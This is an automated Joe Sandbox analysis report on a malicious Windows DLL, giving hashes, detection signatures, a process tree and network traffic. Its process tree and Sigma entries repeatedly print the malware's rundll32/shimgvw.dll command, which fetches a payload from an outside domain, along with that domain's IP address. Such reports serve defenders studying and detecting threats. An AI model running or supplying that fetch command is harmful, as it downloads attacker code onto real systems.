Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UiFttnkl2R.dll

Overview

General Information

Sample name:UiFttnkl2R.dll
renamed because original name is a hash value
Original sample name:d0c554c836f955997316acf30b5039b52e5c9a8b127a5f33107314a481663b5e.dll
Analysis ID:1500942
MD5:8620a8a3f75b8b63766bd0f489f33d6a
SHA1:ffe90dfdfbb5d7d33392887b2a3995cbfba2aae8
SHA256:d0c554c836f955997316acf30b5039b52e5c9a8b127a5f33107314a481663b5e
Tags:dllrammenale-com
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7332 cmdline: loaddll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7384 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7408 cmdline: rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7440 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7392 cmdline: rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmain MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7432 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7716 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Potentially Suspicious Rundll32 Activity
Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7392, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, ProcessId: 7432, ProcessName: rundll32.exe

Data Obfuscation

barindex
Sigma detected: Execute DLL with spoofed extension
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7392, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, ProcessId: 7432, ProcessName: rundll32.exe
Sigma detected: rundll32 run dll from internet
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7392, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt, ProcessId: 7432, ProcessName: rundll32.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://rammenale.com/for2/zetaq.txtZAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtVAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq/ts/Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtLAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtKAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtsC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtGAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtP$Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtEAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtDAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtwAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txttAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt6634-1002Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtrAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaqAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtnAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtent-1002Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtcAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtI%Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtxtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtPfAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt4UAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt50Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtentndowsINetCookies;Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt~Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtentuAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt8Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt4YAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt6Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt4Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtesAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaqtxtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt.Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt4mAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txtentAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt&Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaqonts/cAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt#Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt4erAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq.txt4qAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/zetaq/aAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: UiFttnkl2R.dllReversingLabs: Detection: 42%
Source: UiFttnkl2R.dllVirustotal: Detection: 51%Perma Link
Source: UiFttnkl2R.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: UiFttnkl2R.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF15A4 FindFirstFileW,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6CDF15A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDF15A4 FindFirstFileW,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6CDF15A4

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: Joe Sandbox ViewASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /for2/zetaq.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/zetaq.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/zetaq.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /for2/zetaq.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/zetaq.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/zetaq.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: rammenale.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:04 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:04 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: rundll32.exe, 00000006.00000003.1723075107.00000000050C7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1723013012.00000000050C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.wikipedia
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
Source: rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1717234700.00000000050AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: rundll32.exe, 00000005.00000002.2939554123.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2939929067.00000000062C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000884D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.0000000008838000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/8EEF8FF4BF719EAB539B52
Source: rundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/Data
Source: rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/YSTEM32
Source: rundll32.exe, 00000008.00000002.2937478623.00000000027B7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/fo10280/zet2
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937725359.0000000002B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt
Source: rundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt#
Source: rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt&
Source: rundll32.exe, 00000006.00000002.2940217585.0000000008834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt.
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt4
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt4U
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt4Y
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt4er
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt4m
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt4q
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt50
Source: rundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt6
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt6634-1002
Source: rundll32.exe, 00000005.00000002.2937723951.0000000002A6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt8
Source: rundll32.exe, 00000003.00000002.1721988527.0000000003230000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1722847273.0000000003170000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2937582224.0000000002940000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2937723951.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937794002.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937581731.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937583525.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937725359.0000000002B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtC:
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtD
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtE
Source: rundll32.exe, 00000006.00000002.2937794002.0000000003058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtG
Source: rundll32.exe, 00000006.00000002.2937794002.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtI%
Source: rundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937725359.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtK
Source: rundll32.exe, 00000006.00000002.2940217585.000000000881C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtL
Source: rundll32.exe, 00000006.00000002.2937651056.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtP$
Source: rundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtPf
Source: rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtV
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtZ
Source: rundll32.exe, 00000008.00000002.2937725359.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtc
Source: rundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937794002.000000000301F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtent
Source: rundll32.exe, 00000008.00000002.2939436401.0000000008972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtent-1002
Source: rundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtentndowsINetCookies;
Source: rundll32.exe, 00000008.00000002.2937725359.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtentu
Source: rundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtes
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtg
Source: rundll32.exe, 00000005.00000002.2937723951.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtk
